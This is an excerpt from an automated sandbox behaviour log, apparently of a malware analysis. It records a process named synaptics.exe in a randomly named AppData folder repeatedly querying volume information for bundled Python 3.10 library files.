                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\base64.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\base64.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\base64.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\base64.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\base64.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\base64.cpython-310.pyc.10490720 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\re.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\re.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\re.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\re.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\re.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\re.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\re.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\re.cpython-310.pyc.10670424 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\enum.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\enum.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\enum.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\enum.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\enum.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\enum.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\enum.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\enum.cpython-310.pyc.10628280 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\types.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\types.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\types.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\types.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\types.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\types.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\types.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\types.cpython-310.pyc.10628384 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_compile.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_compile.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\sre_compile.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\sre_compile.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_compile.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_compile.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_compile.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\sre_compile.cpython-310.pyc.10426928 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_parse.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_parse.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\sre_parse.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\sre_parse.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_parse.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_parse.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\sre_parse.cpython-310.pyc.10426592 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_constants.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_constants.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\sre_constants.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\sre_constants.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_constants.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_constants.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\sre_constants.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\sre_constants.cpython-310.pyc.10576352 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\functools.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\functools.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\functools.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\functools.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\functools.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\functools.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\functools.cpython-310.pyc.10577584 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\collections\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\collections\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\collections\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\collections\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\collections\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\collections\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\collections\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\collections\__pycache__\__init__.cpython-310.pyc.10335800 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\keyword.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\keyword.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\keyword.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\keyword.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\keyword.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\keyword.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\keyword.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\keyword.cpython-310.pyc.25361072 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\operator.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\operator.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\operator.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\operator.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\operator.cpython-310.pyc.10578928 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\reprlib.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\reprlib.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\reprlib.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\reprlib.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\reprlib.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\reprlib.cpython-310.pyc.25361176 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\copyreg.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\copyreg.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\copyreg.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\copyreg.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\copyreg.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\copyreg.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\copyreg.cpython-310.pyc.25493848 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\struct.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\struct.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\struct.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\struct.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\struct.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\struct.cpython-310.pyc.10625368 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__pycache__\__init__.cpython-310.pyc.25322624 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\request.py VolumeInformationJump to behavior
